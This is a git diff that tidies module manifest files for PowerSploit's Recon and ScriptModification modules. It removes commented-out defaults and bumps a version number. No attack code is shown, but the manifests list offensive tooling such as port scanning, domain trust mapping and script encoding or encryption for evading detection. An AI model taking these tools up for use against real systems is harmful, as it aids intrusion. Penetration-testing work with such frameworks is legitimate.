@@ -24,39 +21,6 @@ Description = 'PowerSploit Reconnaissance Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of the .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = '' - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = @( 'Get-ComputerDetails', 
@@ -125,29 +89,8 @@ FunctionsToExport = @( 'Invoke-MapDomainTrust' ) -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. -ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}) - # List of all files packaged with this module FileList = 'Recon.psm1', 'Recon.psd1', 'PowerView.ps1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1', 'Invoke-Portscan.ps1', 'Get-ComputerDetails.ps1', 'README.md' -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } diff --git a/ScriptModification/ScriptModification.psd1 b/ScriptModification/ScriptModification.psd1 index d326c12..923c874 100644 --- a/ScriptModification/ScriptModification.psd1 +++ b/ScriptModification/ScriptModification.psd1 @@ -4,7 +4,7 @@ ModuleToProcess = 'ScriptModification.psm1' # Version number of this module. -ModuleVersion = '1.0.0.0' +ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610' @@ -12,9 +12,6 @@ GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610' # Author of this module Author = 'Matthew Graeber' -# Company or vendor of this module -CompanyName = '' - # Copyright statement for this module Copyright = 'BSD 3-Clause' 
@@ -24,65 +21,11 @@ Description = 'PowerSploit Script Preparation/Modification Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of the .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = '' - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = '*' -# Cmdlets to export from this module -CmdletsToExport = '*' - -# Variables to export from this module -VariablesToExport = '' - -# Aliases to export from this module -AliasesToExport = '' - -# List of all modules packaged with this module. 
-ModuleList = @(@{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}) - # List of all files packaged with this module FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1', 'Out-EncryptedScript.ps1', 'Remove-Comments.ps1', 'Usage.md' -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } -- cgit v1.2.3